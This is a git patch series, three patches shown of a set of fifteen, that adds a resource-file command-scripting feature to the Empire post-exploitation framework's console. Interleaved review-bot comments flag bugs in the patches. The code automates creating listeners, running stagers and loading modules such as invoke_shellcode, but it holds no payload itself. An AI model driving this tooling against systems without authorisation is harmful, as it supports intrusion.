From 000f81519d4a97e2eba3ab628b2ea76556ec039b Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:17:35 -0600 Subject: [PATCH 01/15] initial resource command working, but hard coded --- lib/common/empire.py | 72 +++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 71 insertions(+), 1 deletion(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 6d7aa5d..719f718 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -96,7 +96,7 @@ class MainMenu(cmd.Cmd): dispatcher.send('[*] Empire starting up...', sender="Empire") - + self.resourceQueue = [] # print the loading menu messages.loading() @@ -271,6 +271,9 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) @@ -377,10 +380,18 @@ class MainMenu(cmd.Cmd): # CMD methods ################################################### + def postcmd(self, stop, line): + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + + + def default(self, line): "Default handler." pass + def do_resource(self, line): + self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] def do_exit(self, line): "Exit Empire" @@ -391,6 +402,8 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e 
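Review bot: The new `postcmd` override in MainMenu returns None, which discards the `stop` flag that `cmd.Cmd.cmdloop` uses to decide whether to leave the loop, so any `do_*` handler that signals exit by returning True stops working once this hook is installed (the `do_back` that returns True directly above the `postcmd` added to PowerShellAgentMenu on L3 is one visible case). Each override should end with `return stop` after the queue handling; the same omission is in the copies added to AgentsMenu (L2), PythonAgentMenu and ListenersMenu (L4), and ListenerMenu, ModuleMenu and StagerMenu (L5). The guard `if self.resourceQueue and len(self.resourceQueue) > 0:` is equivalent to `if self.resourceQueue:` everywhere it appears. The hard-coded command list in `do_resource` is acknowledged by the subject, so I raise nothing on it here.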
@@ -400,6 +413,8 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -416,6 +431,8 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -424,6 +441,8 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -441,6 +460,8 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) + if self.resourceQueue and len(self.resourceQueue) > 0: + module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -921,6 +942,10 @@ class AgentsMenu(cmd.Cmd): def emptyline(self): pass + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_back(self, line): "Go back to the main menu." @@ -1283,6 +1308,8 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] 
@@ -1291,6 +1318,8 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1307,6 +1336,8 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1419,9 +1450,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) @@ -1532,6 +1567,9 @@ class PowerShellAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -1881,6 +1919,8 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() 
@@ -1989,6 +2029,8 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2046,6 +2088,8 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2331,6 +2375,9 @@ class PythonAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -2679,6 +2726,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2839,6 +2888,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_agents(self, line): "Jump to the Agents menu." @@ -2893,6 +2946,8 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] 
@@ -2901,6 +2956,8 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2915,6 +2972,8 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3044,6 +3103,9 @@ class ListenerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3286,6 +3348,9 @@ class ModuleMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3393,6 +3458,8 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -3655,6 +3722,9 @@ class StagerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." 
From 083cffd27e55e7f8a2f9c1b565ee3e273240c4c8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:42:43 -0600 Subject: [PATCH 02/15] cleaner code for resource files, but still hardcoded --- lib/common/empire.py | 70 +++++++++++++++++++++----------------------- 1 file changed, 33 insertions(+), 37 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 719f718..340579b 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -392,6 +392,7 @@ class MainMenu(cmd.Cmd): def do_resource(self, line): self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] + #self.resourceQueue = ["agents","?","?"] def do_exit(self, line): "Exit Empire" @@ -402,8 +403,6 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e @@ -413,8 +412,6 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -431,8 +428,6 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] 
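Review bot: The added `#self.resourceQueue = ["agents","?","?"]` in `do_resource` is commented-out debugging input and should be dropped rather than committed alongside the real list. The same applies to the two `##`-prefixed lines this commit leaves in PythonAgentMenu's module handler on L9, which keep dead code in the file after the per-call-site injection was removed everywhere else.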
@@ -441,8 +436,6 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -460,8 +453,6 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) - if self.resourceQueue and len(self.resourceQueue) > 0: - module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -938,6 +929,10 @@ class AgentsMenu(cmd.Cmd): self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) self.stdout.write("\n") + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): pass @@ -1308,8 +1303,6 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -1318,8 +1311,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1336,8 +1327,6 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() 
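Review bot: The `cmdloop` override added to AgentsMenu is declared as `def cmdloop(self):`, which narrows the base signature `cmd.Cmd.cmdloop(self, intro=None)`; any caller that passes an intro banner would now get a TypeError. Keeping the parameter and forwarding it, `def cmdloop(self, intro=None):` and `cmd.Cmd.cmdloop(self, intro)`, preserves compatibility at no cost. The identical seed-then-delegate body is repeated in PowerShellAgentMenu (L8), PythonAgentMenu and ListenersMenu (L9), ListenerMenu and ModuleMenu (L10) and StagerMenu (L11), so the signature fix has to be applied in each copy unless the method is hoisted into one shared base.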
@@ -1450,18 +1439,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) - class PowerShellAgentMenu(cmd.Cmd): """ The main class used by Empire to drive an individual 'agent' menu. @@ -1492,6 +1476,10 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -1919,8 +1907,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2029,8 +2015,6 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: 
@@ -2088,8 +2072,6 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2327,6 +2309,10 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2726,8 +2712,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) +## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: +## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2865,6 +2851,11 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -2946,8 +2937,6 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] 
@@ -2956,8 +2945,6 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2972,8 +2959,6 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3091,6 +3076,10 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): """ @@ -3278,6 +3267,11 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -3458,8 +3452,6 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() 
@@ -3684,6 +3676,10 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def validate_options(self): "Make sure all required stager options are completed." From 4bf47277e7d4ee429a7d218a2a4e4c95ff0553d5 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:45:07 -0600 Subject: [PATCH 03/15] using append instead of extend, and reading resource file --- lib/common/empire.py | 45 ++++++++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 23 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 340579b..4584aba 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -272,7 +272,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -382,7 +382,7 @@ class MainMenu(cmd.Cmd): def postcmd(self, stop, line): if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) 
@@ -390,9 +390,10 @@ class MainMenu(cmd.Cmd): "Default handler." pass - def do_resource(self, line): - self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] - #self.resourceQueue = ["agents","?","?"] + def do_resource(self, arg): + self.resourceQueue = [] + with open(arg) as f: + self.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire" @@ -931,7 +932,7 @@ class AgentsMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -939,8 +940,7 @@ class AgentsMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): "Go back to the main menu." @@ -1478,7 +1478,7 @@ class PowerShellAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -1557,7 +1557,7 @@ class PowerShellAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." 
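Review bot: `with open(arg) as f:` in the rewritten `do_resource` has no error handling, so a missing or empty path raises IOError out of `onecmd` and, since the surrounding `cmdloop` does not catch it, out of the console. The file is also queued verbatim: blank and `#` lines become commands, and a blank line reaches `emptyline`, which in the stock `cmd.Cmd` re-runs the previous command in any menu that does not override it (AgentsMenu does on L2; I cannot see whether MainMenu does). Finally `self.resourceQueue = []` replaces the queue, so a `resource` line inside a resource file discards the remainder of the outer script instead of running in place; prepending the new lines keeps the outer script intact. The seven copies added in the next commit (L15, L16) inherit all three points.
```python
    def do_resource(self, arg):
        try:
            with open(arg) as f:
                lines = [l.strip() for l in f.read().splitlines()]
        except IOError as e:
            print helpers.color("[!] Unable to read resource file: %s" % (e))
            return
        # skip blank/comment lines; prepend so a nested 'resource'
        # runs in place instead of discarding the rest of the outer script
        self.resourceQueue[0:0] = [l for l in lines if l and not l.startswith('#')]
```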
@@ -2311,7 +2311,7 @@ class PythonAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2363,7 +2363,7 @@ class PythonAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -2712,8 +2712,6 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) -## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: -## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2853,7 +2851,7 @@ class ListenersMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -2880,9 +2878,10 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): + print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + print 6 def do_agents(self, line): "Jump to the Agents menu." 
@@ -3078,7 +3077,7 @@ class ListenerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -3094,7 +3093,7 @@ class ListenerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3269,7 +3268,7 @@ class ModuleMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -3344,7 +3343,7 @@ class ModuleMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3678,7 +3677,7 @@ class StagerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def validate_options(self): @@ -3720,7 +3719,7 @@ class StagerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." From 753c2e20de4c3b57cf17d57bf2062fdd13d34db2 Mon Sep 17 00:00:00 2001 
